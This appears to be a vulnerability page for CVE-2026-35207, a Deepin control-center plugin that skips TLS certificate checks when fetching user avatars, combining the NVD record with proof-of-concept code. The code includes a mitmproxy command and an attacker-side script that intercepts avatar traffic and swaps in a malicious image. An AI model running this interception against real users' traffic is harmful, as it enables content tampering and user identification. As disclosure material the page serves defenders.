CVE-2026-35207

# PoC Concept: Demonstrating the vulnerability logic (Client Side) # This script simulates how the vulnerable client requests the avatar. import requests # Vulnerable configuration: verify=False skips TLS certificate verification def get_avatar_vulnerable(url): try: # The vulnerability lies here: SSL verification is disabled response = requests.get(url, verify=False, timeout=5) print(f"[*] Status: {response.status_code}") print(f"[*] Content Type: {response.headers.get('Content-Type')}") # In a real attack scenario, this content could be replaced by an attacker return response.content except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target_url = "https://openapi.deepin.com/avatar/user_id" print(f"[*] Requesting avatar from {target_url} without certificate verification...") get_avatar_vulnerable(target_url) # PoC Concept: MITM Attack Setup (Attacker Side) # Tools like mitmproxy can be used to intercept and modify traffic. # Example command to run mitmproxy: # mitmproxy --ignore-hosts '.*' -s modify_avatar.py # modify_avatar.py script content: """ from mitmproxy import http def request(flow: http.HTTPFlow) -> None: # Log the request print(f"[MITM] Intercepting request to: {flow.request.pretty_host}") def response(flow: http.HTTPFlow) -> None: # Check if the request is for an avatar if "avatar" in flow.request.path: print("[MITM] Replacing avatar content with malicious image...") # Replace the response content with a local malicious image with open("malicious_avatar.png", "rb") as f: flow.response.content = f.read() flow.response.headers["Content-Length"] = str(len(flow.response.content)) """

{"cve": {"id": "CVE-2026-35207", "sourceIdentifier": "[email protected]", "published": "2026-04-09T18:17:01.110", "lastModified": "2026-04-13T15:02:27.760", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "dde-control-center is the control panel of DDE, the Deepin Desktop Environment. plugin-deepinid is a plugin in dde-control-center, which provides the deepinid cloud service. Prior to 6.1.80, plugin-deepinid is configured to skip TLS certificate verification when fetching the user's avatar from openapi.deepin.com or other providers. An MITM attacker could intercept the traffic, replace the avatar with a malicious or misleading image, and potentially identify the user by the avatar. This vulnerability is fixed in dde-control-center 6.1.80 and 5.9.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://github.com/linuxdeepin/dde-control-center/commit/6fc206120be28d9eef7d72258662bcabb834367f", "source": "[email protected]"}, {"url": "https://github.com/linuxdeepin/dde-control-center/commit/cd95b054ff10a35bc9284431631305bd56244b3d", "source": "[email protected]"}, {"url": "https://github.com/linuxdeepin/dde-control-center/pull/3146", "source": "[email protected]"}, {"url": "https://github.com/linuxdeepin/developer-center/security/advisories/GHSA-jf2h-4vqc-3jgc", "source": "[email protected]"}]}}